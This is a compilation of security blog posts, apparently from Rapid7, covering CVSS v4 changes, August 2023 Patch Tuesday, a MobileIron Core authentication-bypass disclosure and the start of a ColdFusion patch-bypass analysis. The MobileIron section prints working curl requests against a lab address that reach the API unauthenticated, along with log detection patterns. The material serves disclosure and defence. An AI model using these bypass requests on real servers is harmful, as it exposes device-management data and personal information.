CVSS provides a standardized method for evaluating the potential severity (and in many cases impact) of a vulnerability so organizations can make informed decisions about how to respond to specific security issues. Its fundamentals have been widely adopted by vendors, researchers, academics, and vulnerability analysts.

What's New in CVSS v4

The standard has been improved over time with the release of v1 in Feb. 2005, v2 in June 2007, and v3 in June 2015. The current version (v3.1) debuted in June 2019. Version 4 is slated for release on October 1, 2023.

So, what’s new in CVSS v4?

CVSS v4 ushers in some meaningful improvements wrapped in a bit of nuanced complexity, especially if you’re a vendor or threat researcher responsible for providing base scores. As far back as CVSS v1, the standard has recognized that things like time, value of the target, exploit activity, and specific operating environment all influence the amount of risk associated with a unique vulnerability. A balance between completeness and ease of use has been sought in development of more recent CVSS versions.

Temporal and Environmental Metrics were intended to provide business context to help influence tradeoff decisions. However, these metrics were “optional” in v3, and adoption stagnated and never really grew beyond use of Base Metrics. Reality reflects this observation partially due to the score subjectivity stemming from assessor interpretation(s), human bias, but most importantly the fact that calculating “optional” metrics requires resources and time that organizations might invest in other areas.

The following summary is presented in sequence across each of the scoring systems v4 groups:

Base Metric Groups and Definitions

Greater precision and accuracy by introducing four (4) groups where only one group has been in practical use until now. The specification document also emphasizes that Base Metrics, provided by vendors and researchers, represent intrinsic qualities. Threat and Environmental groups, which provide business and situational context are intended to be, and can only be, provided by end user organizations.

  • Clarity that CVSS-B is designed to measure the severity of a vulnerability and should not be used alone to assess risk, while CVSS-BTE much more closely approximates risk.
  • CVSS-B – Base metrics plus….. [what’s commonly used today and composed of the Base Metric Group]
  • CVSS-BT – Base and Threat Metrics
  • CVSS-BE – Base and Environmental Metrics
  • CVSS-BTE – Base, Threat, Environmental metrics
  • more on the Supplemental Metric Group later
What's New in CVSS v4

Figure 1. CVSS v.4 Metric Groups, FIRST.org (2023)

Exploitability Metric provides clarification to improve upon the often cited lack of granularity

  • Attack Vector (physical/logical location) – {Network, Adjacent, Local, Physical}
  • Attack Complexity (consideration for mitigating controls) – {Low, High}
  • Attack Requirements (dependencies for exploit/attack to be successful) – {None, Present},
  • Privileges Required (needed prior to attempted exploit) – {None, Low, High}
  • User Interaction (is participation necessary) – {None, Passive, Active}

Impact Metric clarification that Impact measures consequences post attack, also intended usage guidance (with examples) and consideration for Vulnerable (primary) and Subsequent (secondary) Systems across Confidentiality (C), Integrity (I) and Availability (A) dimensions to improve application and usage, these measures replace the often criticized and misused Scope metric in v3.x.

  • Vulnerable System Confidentiality (data disclosure beyond authorized users) – {High, Low, None}
  • Vulnerable System Integrity (loss of trust or accuracy of the data) – {High, Low, None}
  • Vulnerable System Availability (loss of accessibility to compute resources) – {High, Low, None}
  • Subsequent System Confidentiality (data disclosure beyond authorized users) – {High, Low, None}
  • Subsequent System Integrity (loss of trust or accuracy of the data) – {High, Low, None}
  • Subsequent System Availability (loss of accessibility to compute resources) – {High, Low, None}

Threat Metric Group and Definition

Previously called Temporal Metrics in v3.x, Threat Metrics are intended to provide the ‘likelihood’ of a particular CVE being attacked, there are three (3) components which should be assessed in deriving a “Exploit Maturity” value {Not Defined, Attacked, Proof-of-Concept, Unreported}, responsibility for which lies with the affected organization.

  • Current state of exploit techniques (ex. consider advances with ML alongside the Mitre ATT&CK TTPs)
  • Exploit code availability (ex. is there a POC on Github)
  • Active, observable exploitation (ex. what’s the threat analyst or your TIP tell you)

Environmental Metric Group

Like the Threat Metric Group, this set of assessments is intended to be derived by the affected organization and allow an analyst to further tailor any one CVSS score for the use case of the affected asset/system. We return to the security fundamental  ‘CIA Triad’ as the measures to modify or tailor the overall CVSS v4 score(s).

  • Confidentiality | Integrity | Availability Requirement – {Not Defined (insufficient information to choose value), High (catastrophic adverse effect), Medium (serious adverse effect), Low (limited adverse effect)}

Modified Base Metrics within the Environmental Group are intended to codify “mitigations” which may be in place for any vulnerability OR capture instances where the risk is greater due to a lack of expected controls – for example an administrative UI exposed to the internet.

Accommodation for Safety (human safety) where exploitation may result in injuries or worse.

Supplemental Metric Group

An entirely new group of optional measures to accommodate a wide spectrum of extrinsic factors that can influence risk decisions including consideration for

  • Automatable (can an attacker automate exploitation en masse) – {Not Defined, No, Yes}
  • Recovery (ability for a system to resume performance and availability after an attack) – {Not Defined, Automatic, User, Irrecoverable}
  • Safety (degree of impact for predictable injury using IEC 61508 Consequence Categories) – {Not Defined, Present, Negligible}
  • Value Density (level of resources attacker will gain after a single exploit) – {Not Defined, Diffused, Concentrated}
  • Provider Urgency (supplemental urgency rating, available to any supplier in the chain) – {Not Defined, Red, Amber, Green, Clear}
  • Vulnerability Response Effort (supplemental information to suggest level-of-effort (LOE) involved in remediation/mitigation) – {Not Defined, Low, Moderate, High}

That concludes this summary of changes pertaining to the metrics used to derive and supplement a CVSS v4 score. There are also several functional accommodations that have been made including:

  • Vector String updates to accommodate all the revised metric definitions and versioning, which may be a bit unwieldy in practical use for some, but machine readable has extensible value – get your decoder rings ready (ex. CVSS:4.0/AV:P/AC:H/AT:P/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:H/SA:L/S:P/R:U/RE:M/U:Clear/MAV:A/MAT:P/MPR:N/MUI:A/MVC:H/MVI:L/MVA:N/MSC:H/MSI:L/MSA:N/CR:H/IR:M/AR:L/E:P) [Check out the Interactive Caclulator]
  • Qualitative and quantitative improvements to create greater vuln score distribution and score results, improvements to underlying equations to generate scores
  • Accommodation for unique Base Scores for multiple product versions, platforms and/or OS (operating system)
  • Guidance to baseline Software Vulnerabilities at ‘reasonable worst-case’ implementation scenario and remove confusion regarding software library effects, for example
  • Stronger advocacy to correlate data from both asset management and vulnerability management systems, whenever possible, to drive adoption and use of all four (4) metric groups, similarly to better incorporate and optimize the use of threat intelligence
  • and, finally consideration for transitional support so a single vulnerability may accommodate use of both v4.0 scores and current v3.1 scores.

Day to day impacts

I wouldn’t anticipate the calculation and LOE to derive a CVSS-B (Base Metric) score to significantly increase, but the thought process and underlying analysis sequence will require some updates to existing processes. The bulk of the Base Metric procedural updates will fall to the usual suspects and host of vendors. The more interesting impacts will affect the security teams and vulnerability analysts. It isn’t provocative to suggest that operationalizing the optional metrics, both in v3.x and in the current proposal, could require a pretty heavy lift. Consider the effort a vuln analyst would need to invest on a typical Patch Tuesday to derive Threat Metrics and Environmental Metric groups for every relevant CVE. Doing so for every new vuln and derivation for each Patch Tuesday could easily bleed into the next patch cycle, so automation using enterprise grade vuln management solutions like Rapid7 IVM will continue to be a necessity to facilitate efficient vuln response at scale.

The preceding scenario is precisely the rationale behind the development and release of Rapid7’s new risk scoring model. It will deliver on many of the core tenets of risk-assessment systems including the flexibility to accommodate organizationally specific factors like those defined under Threat and Environmental Metric Groups business to provide teams with a prioritized list of remediation targets.

Summary

While perceptually complex, as proposed CVSS v4 is a meaningful, well researched and structured framework to advance the discipline of vulnerability management. As many have opined, there is room for improvement in the, now old enough to drive, scoring system and in the cybersecurity’s rigor and practical use of all that is considered in the v4 User Guide.

It will be interesting to understand the community’s reaction towards adoption both in scale and complexity—all at once “big bang” approach or incremental change over a longer time horizon. Also, how much of the new system is adopted in practice. Regardless, the resulting work and effort is impressive both in scale and detail. It will resonate with many in the cybersecurity and the broader information technology field(s) and certainly deliver some overdue considerations for others.

The anonymous public comment period ([email protected]) closed on July 31, 2023. First.org is targeting all feedback to be reviewed and addressed by August 31, 2023, with a target official publication date of October 1, 2023.

Patch Tuesday – August 2023

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2023/08/08/patch-tuesday-august-2023/

Patch Tuesday - August 2023

Microsoft is addressing 86 vulnerabilities this August Patch Tuesday, including one zero-day vulnerability, as well as five critical remote code execution (RCE) vulnerabilities, and 12 browser vulnerabilities. An unpatched zero-day malicious document vulnerability from July also receives Windows OS updates and clarification in August.

ASP.NET: zero-day denial of service in Kestrel web server

The lone zero-day vulnerability patched this month is CVE-2023-38180, a denial of service (DoS) vulnerability in .NET , ASP.NET Core 2.1, and recent versions of Visual Studio. Microsoft is aware of in-the-wild exploitation. While the only impact noted is availability, administrators responsible for web apps built on ASP.NET are well-advised to patch as soon as possible. The cross-platform Kestrel web server is included in ASP.NET Core, and contains protections so that it can detect and disconnect a potentially malicious client. However, Kestrel will sometimes fail to disconnect the client, leading to denial of service. Microsoft notes that mitigating factors may include a reverse proxy or Web Application Firewall (WAF), since these are designed to detect and mitigate HTTP-based attacks.

Teams: critical remote execution vuln via malicious meeting

Potentially of greater concern are a pair of Microsoft Teams critical remote code execution (RCE) vulnerabilities. While the CVSS base score of 8.8 is at the top end of NVD’s High severity, Microsoft assesses both CVE-2023-29328 and CVE-2023-29330 as Critical on its own proprietary severity rating, and the advisories make clear why that is: both vulnerabilities allow an attacker to execute code in the context of anyone who joins a Teams meeting set up by the attacker. This affects Teams on all platforms: Windows Desktop, macOS, iOS, and Android. Given how widely Teams is used not just within organizations, but for collaboration outside of the organization in contexts requiring a level of trust of third parties not known to participants  – pre-sales calls, scoping calls, industry association calls and so on – these vulnerabilities surely deserve immediate remediation attention.

Windows MSMQ: critical RCE

The Windows Message Queuing Service is once again the site of multiple critical RCE vulnerabilities this month. CVE-2023-36910, CVE-2023-36911, and CVE-2023-35385 all come with a CVSSv3 base score of 9.8, reflecting the serious potential impact, lack of privileges required, and low attack complexity. One mitigating factor: the Microsoft Message Queueing Service must be enabled and listening on port 1801 for an asset to be vulnerable, and the Message Queueing Service is not installed by default. As Rapid7 has noted previously, however, a number of applications – including Microsoft Exchange – may quietly introduce MSMQ as part of their own installation routine.

Outlook: critical maldoc arbitrary code execution

Rounding out the August critical RCE vulnerabilities, CVE-2023-36895 describes a flaw in Microsoft Outlook where an attacker who can convince a user to open a specially-crafted malicious file will be able to execute code in the context of the victim. Patch Tuesday watchers will be familiar with Microsoft’s clarification that this type of exploit is sometimes referred to as arbitrary code execution (ACE) since the attack is local – a malicious document opened on the asset – even if the attacker is remote. With no known public disclosure, no known exploitation in the wild, and Microsoft assessing that exploitation is less likely, this is hopefully a case of patch-and-forget.

July unpatched zero-day: revised and patched in August

One month ago, on Patch Tuesday July 2023, Microsoft published a zero-day vulnerability for which they provided no patch, leaving many defenders understandably concerned. Exploitation of CVE-2023-36884 requires that the user opens a malicious document crafted by an attacker, and as Rapid7 noted at the time of publication, Microsoft did provide several mitigation strategies. Happily, the August 2023 Windows updates bring relief from CVE-2023-36884 in the form of patches for every current version of Windows: from Windows 11 and Server 2022 all the way back to Windows Server 2008 for 32-bit Systems Service Pack 2. These patches supersede last month’s mitigation advice, but at least some of those mitigation strategies remain generally applicable.

The advisory for CVE-2023-36884 has been radically updated today with a new title (Windows Search Remote Code Execution Vulnerability) in place of the previous title (Office and Windows HTML Remote Code Execution Vulnerability). Microsoft now states that the vulnerability is in fact a Windows Search security bypass involving a Mark of the Web (MOTW) removal leading to code execution on the victim system. Microsoft has also released a complementary non-CVE advisory ADV230003 with the latest defense-in-depth advice for Microsoft Office administrators; Microsoft claims that following the defense-in-depth advice will stop the attack chain leading to exploitation of CVE-2023-36884, and thus potentially also protect against other as-yet-unknown vulnerabilities. However, defenders should consider that other attack chains may exist which do not involve Office at all.

Exchange: critical elevation of privilege

Exploitation of CVE-2023-21709 allows an attacker to authenticate as a different user. Exchange admins should note that additional remediation actions must be taken after patching. Although the CVSSv3 base score is a Critical-ranked 9.8, Microsoft’s proprietary severity scale assesses this vulnerability as Important rather than Critical, since exploitation involves brute-forcing passwords, and strong passwords are challenging to brute force.

Summary Charts

Patch Tuesday - August 2023
Message Queueing and Exchange again.
Patch Tuesday - August 2023
Remote Code Execution covers a broad range of exploits.
Patch Tuesday - August 2023
A typical distribution of CVSSv3 base scores.
Patch Tuesday - August 2023
This heatmap shows distribution of vulnerabilities, rather than risk.

Summary Tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38176 Azure Arc-Enabled Servers Elevation of Privilege Vulnerability No No 7
CVE-2023-35394 Azure HDInsight Jupyter Notebook Spoofing Vulnerability No No 4.6
CVE-2023-36877 Azure Apache Oozie Spoofing Vulnerability No No 4.5
CVE-2023-35393 Azure Apache Hive Spoofing Vulnerability No No 4.5
CVE-2023-38188 Azure Apache Hadoop Spoofing Vulnerability No No 4.5
CVE-2023-36881 Azure Apache Ambari Spoofing Vulnerability No No 4.5

Azure Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36869 Azure DevOps Server Spoofing Vulnerability No No 6.3

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38157 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability No No 6.5
CVE-2023-4078 Chromium: CVE-2023-4078 Inappropriate implementation in Extensions No No N/A
CVE-2023-4077 Chromium: CVE-2023-4077 Insufficient data validation in Extensions No No N/A
CVE-2023-4076 Chromium: CVE-2023-4076 Use after free in WebRTC No No N/A
CVE-2023-4075 Chromium: CVE-2023-4075 Use after free in Cast No No N/A
CVE-2023-4074 Chromium: CVE-2023-4074 Use after free in Blink Task Scheduling No No N/A
CVE-2023-4073 Chromium: CVE-2023-4073 Out of bounds memory access in ANGLE No No N/A
CVE-2023-4072 Chromium: CVE-2023-4072 Out of bounds read and write in WebGL No No N/A
CVE-2023-4071 Chromium: CVE-2023-4071 Heap buffer overflow in Visuals No No N/A
CVE-2023-4070 Chromium: CVE-2023-4070 Type Confusion in V8 No No N/A
CVE-2023-4069 Chromium: CVE-2023-4069 Type Confusion in V8 No No N/A
CVE-2023-4068 Chromium: CVE-2023-4068 Type Confusion in V8 No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-35390 .NET and Visual Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36899 ASP.NET Elevation of Privilege Vulnerability No No 7.5
CVE-2023-38180 .NET and Visual Studio Denial of Service Vulnerability Yes No 7.5
CVE-2023-38178 .NET Core and Visual Studio Denial of Service Vulnerability No No 7.5
CVE-2023-36873 .NET Framework Spoofing Vulnerability No No 7.4
CVE-2023-35391 ASP.NET Core SignalR and Visual Studio Information Disclosure Vulnerability No No 7.1

Developer Tools Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36897 Visual Studio Tools for Office Runtime Spoofing Vulnerability No No 8.1

ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-35379 Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36876 Reliability Analysis Metrics Calculation (RacTask) Elevation of Privilege Vulnerability No No 7.1

Exchange Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-21709 Microsoft Exchange Server Elevation of Privilege Vulnerability No No 9.8
CVE-2023-38181 Microsoft Exchange Server Spoofing Vulnerability No No 8.8
CVE-2023-38185 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-35368 Microsoft Exchange Remote Code Execution Vulnerability No No 8.8
CVE-2023-35388 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8
CVE-2023-38182 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38167 Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability No No 7.2
CVE-2023-35389 Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability No No 6.5

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-29328 Microsoft Teams Remote Code Execution Vulnerability No No 8.8
CVE-2023-29330 Microsoft Teams Remote Code Execution Vulnerability No No 8.8
CVE-2023-36891 Microsoft SharePoint Server Spoofing Vulnerability No No 8
CVE-2023-36892 Microsoft SharePoint Server Spoofing Vulnerability No No 8
CVE-2023-36895 Microsoft Outlook Remote Code Execution Vulnerability No No 7.8
CVE-2023-36865 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36866 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2023-35372 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2023-35371 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2023-36896 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2023-36890 Microsoft SharePoint Server Information Disclosure Vulnerability No No 6.5
CVE-2023-36894 Microsoft SharePoint Server Information Disclosure Vulnerability No No 6.5
CVE-2023-36893 Microsoft Outlook Spoofing Vulnerability No No 6.5

SQL Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38169 Microsoft OLE DB Remote Code Execution Vulnerability No No 8.8

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38175 Microsoft Windows Defender Elevation of Privilege Vulnerability No No 7.8

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-35387 Windows Bluetooth A2DP driver Elevation of Privilege Vulnerability No No 8.8
CVE-2023-38186 Windows Mobile Device Management Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35382 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35386 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38154 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36904 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36898 Tablet Windows User Interface Application Core Remote Code Execution Vulnerability No No 7.8
CVE-2023-38170 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8
CVE-2023-35378 Windows Projected File System Elevation of Privilege Vulnerability No No 7
CVE-2023-36905 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability No No 5.5
CVE-2023-36914 Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability No No 5.5
CVE-2023-35384 Windows HTML Platforms Security Feature Bypass Vulnerability No No 5.4

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36910 Microsoft Message Queuing Remote Code Execution Vulnerability No No 9.8
CVE-2023-36911 Microsoft Message Queuing Remote Code Execution Vulnerability No No 9.8
CVE-2023-35385 Microsoft Message Queuing Remote Code Execution Vulnerability No No 9.8
CVE-2023-35381 Windows Fax Service Remote Code Execution Vulnerability No No 8.8
CVE-2023-36882 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-36903 Windows System Assessment Tool Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35359 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35380 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36900 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38184 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 7.5
CVE-2023-35383 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5
CVE-2023-36912 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-38172 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-36913 Microsoft Message Queuing Information Disclosure Vulnerability No No 6.5
CVE-2023-36909 Microsoft Message Queuing Denial of Service Vulnerability No No 6.5
CVE-2023-35376 Microsoft Message Queuing Denial of Service Vulnerability No No 6.5
CVE-2023-38254 Microsoft Message Queuing Denial of Service Vulnerability No No 6.5
CVE-2023-35377 Microsoft Message Queuing Denial of Service Vulnerability No No 6.5
CVE-2023-36908 Windows Hyper-V Information Disclosure Vulnerability No No 5.7
CVE-2023-36889 Windows Group Policy Security Feature Bypass Vulnerability No No 5.5
CVE-2023-36906 Windows Cryptographic Services Information Disclosure Vulnerability No No 5.5
CVE-2023-36907 Windows Cryptographic Services Information Disclosure Vulnerability No No 5.5
CVE-2023-20569 AMD: CVE-2023-20569 Return Address Predictor No No N/A

CVE-2023-35082 – MobileIron Core Unauthenticated API Access Vulnerability

Post Syndicated from Stephen Fewer original https://blog.rapid7.com/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/

Overview

CVE-2023-35082 - MobileIron Core Unauthenticated API Access Vulnerability

While investigating CVE-2023-35078, a critical API access vulnerability in Ivanti Endpoint Manager Mobile and MobileIron Core that was exploited in the wild, Rapid7 discovered a new vulnerability that allows unauthenticated attackers to access the API in older unsupported versions of MobileIron Core (11.2 and below). Rapid7 reported this vulnerability to Ivanti on July 26, 2023 and we are now disclosing it in accordance with our vulnerability disclosure policy. The new vulnerability has been assigned CVE-2023-35082.

Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain, Rapid7 would consider this new vulnerability a patch bypass for CVE-2023-35078 as it pertains to version 11.2 and below of the product. For additional context on CVE-2023-35078 and its impact, see Rapid7’s emergent threat response blog here and our AttackerKB assessment of the vulnerability.

Product Description

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, is a management platform that allows an organization to manage mobile devices such as phones and tablets; enforcing content and application policies on these devices. The product was previously called MobileIron Core, and was rebranded to Endpoint Manager Mobile after Ivanti acquired MobileIron in 2020.

Versions 11.8 and above of the product are Endpoint Manager Mobile. The version of the product Rapid7 determined was vulnerable to CVE-2023-35082 is MobileIron Core. Ivanti told Rapid7 that CVE-2023-35082 affects the following versions of the product:

  • MobileIron Core 11.2 and below

Ivanti’s advisory for CVE-2023-35082 is here.

Credit

This issue was discovered by Stephen Fewer, a Principal Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor Statement

We are grateful to Rapid7 for their discovery of an issue in MobileIron Core 11.2, a version which went out of support on March 15, 2022. The issue is also present in prior versions of the product which are out of support. We will not be providing any remediation for this vulnerability as the issue was incidentally resolved as a product bug in MobileIron Core 11.3 and had not previously been identified as a vulnerability. We are actively working with our customers to upgrade to the latest version of Ivanti Endpoint Manager Mobile (EPMM) or migrate to the cloud version of the product, Ivanti Neurons for MDM.

The security of our customers is Ivanti’s top priority, and we regularly provide updates to the supported versions of our solutions to protect customers from new and emerging threats. We are upholding our commitment to deliver and maintain secure products, and investing significant resources to ensure that all our solutions continue to meet our own high standards.

Impact

CVE-2023-35082 allows a remote unauthenticated attacker to access the API endpoints on an exposed management server. An attacker can use these API endpoints to perform a multitude of operations as outlined in the official API documents, including the ability to disclose personally identifiable information (PII) and perform modifications to the platform. Additionally, should a separate vulnerability be present in the API, an attacker can chain these vulnerabilities together. For example, CVE-2023-35081 could be chained with CVE-2023-35082 to allow an attacker write malicious webshell files to the appliance, which may then be executed by the attacker.

Exploitation

In our testing of CVE-2023-35078, we had access to MobileIron Core version 11.2.0.0-31. After reproducing the original vulnerability, we proceeded to apply Ivanti’s hotfix ivanti-security-update-1.0.0-1.noarch.rpm as per the Ivanti Knowledge Base article 000087042. We verified that the hotfix does successfully remediate CVE-2023-35078. However, we found a variation of the same attack that enables a remote attacker to access the API endpoints without authentication.

First we installed MobileIron Core 11.2.0.0-31 and verified we could leverage CVE-2023-35078 to access an API endpoint unauthenticated. Note the inclusion of the /aad/ segment in the URL path to exploit the original vulnerability, CVE-2023-35078.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

We then installed the vendor-supplied hotfix ivanti-security-update-1.0.0-1.noarch.rpm. After we rebooted the system, we verified the hotfix prevents the original exploit request shown above.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
<html>
<body>
        <h2>HTTP Status 403 - Access is denied</h2>
        <h3>You are unauthorized to access this page.</h3>
</body>
</html>

However, a variation of the above request is still able to access the API endpoints without authentication, as shown below. Note the use of /asfV3/ in the URL path in place of the original exploit’s use of /aad/.

c:\> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

Indicators of Compromise

The following indicators of compromise are present in the Apache HTTP logs stored on the appliance.

The log file /var/log/httpd/https-access_log will have an entry showing a request to a targeted API endpoint, containing /mifs/asfV3/api/v2/ in the path with a HTTP response code of 200. Blocked exploitation attempts will show an HTTP response code of either 401 or 403. For example:

192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285

Similarly, the log file /var/log/httpd/https-request_log will have an entry showing a request to a targeted API endpoint containing /mifs/asfV3/api/v2/ in the path. For example:

2023-07-28--15-24-51 192.168.86.34 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 68 "-" "curl/8.0.1"

Note that log entries containing /mifs/asfV3/api/v2/ in the path indicate exploitation of CVE-2023-35082, whilst log entries containing /mifs/aad/api/v2/ in the path indicate exploitation of CVE-2023-35078.

Remediation

MobileIron Core customers who are running unsupported versions of the product, including versions affected by CVE-2023-35082 (MobileIron Core 11.2 and below), should upgrade to a supported version as soon as possible.

Rapid7 Customers

Rapid7 customers will have unauthenticated detection of this vulnerability in August 2, 2023’s content release.

Timeline

  • July 26, 2023: Rapid7 sends disclosure information to Ivanti security.
  • July 28, 2023: Rapid7 contacts Ivanti via a second channel to confirm receipt of disclosure information. Ivanti confirms initial disclosure was not received. Rapid7 resends disclosure documents. Ivanti confirms receipt.
  • July 28, 2023: Ivanti confirms findings.
  • July 31, 2023: Ivanti confirms a security advisory will be published, requests a call with Rapid7 to address what they consider inaccuracies in our disclosure.
  • August 1, 2023: Rapid7 and Ivanti discuss the two vulnerabilities (CVE-2023-35078, CVE-2023-35082). Rapid7 agrees to update this disclosure with points of clarification to highlight Ivanti’s perspective. Rapid7 also agrees to clarify product terminology (i.e., that CVE-2023-35082 only affects MobileIron Core, not later versions of the product which were renamed Endpoint Manager Mobile).
  • August 2, 2023: This disclosure.

CVE-2023-38205: Adobe ColdFusion Access Control Bypass [FIXED]

Post Syndicated from Stephen Fewer original https://blog.rapid7.com/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/

CVE-2023-38205: Adobe ColdFusion Access Control Bypass [FIXED]

On July 11, 2023, Rapid7 and Adobe disclosed CVE-2023-29298, an access control bypass vulnerability affecting ColdFusion, which Rapid7 had reported to Adobe in April 2023. The vulnerability allows an attacker to bypass the product feature that restricts external access to the ColdFusion Administrator. Rapid7 and Adobe believed that CVE-2023-29298 was fixed upon publishing our coordinated disclosure (Rapid7 explicitly noted in our disclosure that we had not tested the patch Adobe released).

Upon review of the patch for CVE-2023-29298 as found in ColdFusion 2021 Update 8 (2021.0.08.330144), Rapid7 discovered that the patch released on July 11 does not successfully remediate the original issue and can be bypassed by an attacker. Adobe assigned CVE-2023-38205 to the patch bypass and has issued a complete fix as of July 19, 2023.

Rapid7 has observed exploitation of CVE-2023-29298 in the wild in multiple customer environments. Our team published a blog with observations and guidance for customers on July 17. We have validated that the new patch released July 19 fully remediates the issue.

Affected products

The following products are vulnerable to CVE-2023-38205:

  • Adobe ColdFusion 2023 Update 2 and earlier
  • Adobe ColdFusion 2021 Update 8 and earlier
  • Adobe ColdFusion 2018 Update 18 and earlier

Credit

This issue was discovered by Stephen Fewer, a Principal Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor Statement

Adobe provided the following statement to Rapid7:
“Adobe recommends updating ColdFusion installations to the latest release. Please see APSB23-47 for more information. Adobe is aware that CVE-2023-38205 has been exploited in the wild in limited attacks targeting Adobe ColdFusion.”

Analysis

The July 11 patch for CVE-2023-29298 modifies the vulnerable method IPFilterUtils.checkAdminAccess to use a new helper method Utils.canonicalizeURI to transform a URL into its canonical form before performing the access control, as shown below.

  private static final String[] RESTRICTED_INTERNAL_PATHS = new String[] { "/restplay", "/cfide/restplay", "/cfide/administrator", "/cfide/adminapi", "/cfide/main", "/cfide/componentutils", "/cfide/wizards", "/cfide/servermanager", "/cfide/lockdown" };


  public static void checkAdminAccess(HttpServletRequest req) {
    String uri = Utils.getServletPath(req);
    uri = Utils.canonicalizeURI(uri.toLowerCase()); // <----
    for (String restrictedPath : RESTRICTED_INTERNAL_PATHS) {
      if (uri.startsWith(restrictedPath)) {
        String ip = req.getRemoteAddr();
        if (!isAllowedIP(ip))
          throw new AdminAccessdeniedException(ServiceFactory.getSecurityService().getAllowedAdminIPList(), ip);
        break;
      }
    }
  }


The method Utils.canonicalizeURI attempts to remove sequences of characters such as duplicate forward slashes, double dot notation and redundant dot path segments in a URLs path, as shown below.

  public static String canonicalizeURI(String uri) {
    if (uri == null || uri.length() == 0)
      return uri;
    uri = uri.replace('\\', '/');
    uri = trimDuplicateSlashes(uri);
    uri = collapseDotDots(uri); // <----
    uri = trimTrailingDotsSpacesNull(uri);
    if (uri.charAt(0) == '.')
      uri = uri.substring(1);
    uri = substitute(uri, "/./", "/");
    if (uri.endsWith("/."))
      uri = uri.substring(0, uri.length() - 2);
    if (uri.length() == 0)
      uri = "/";
    return uri;
  }

Of note is the method Utils.collapseDotDots, which will remove all path segments that contain a double dot along with the preceding path segment. For example, if a URL path has the string “/hello/../world/” then the method Utils.collapseDotDots would correctly transform this string into “/world/” by deleting the character sequence “/hello/..” via a call to StringBuffer.delete as shown below.

  public static String collapseDotDots(String str) {
    if (str.indexOf("/..") == -1)
      return str;
    StringBuffer sb = new StringBuffer(str);
    int i;
    while ((i = str.indexOf("/..")) != -1) {
      int segmentStart = str.lastIndexOf('/', i - 1);
      sb.delete(segmentStart, i + 3); // <----
      str = sb.toString();
    }
    if (str.length() == 0)
      str = "/";
    return str;
  }  

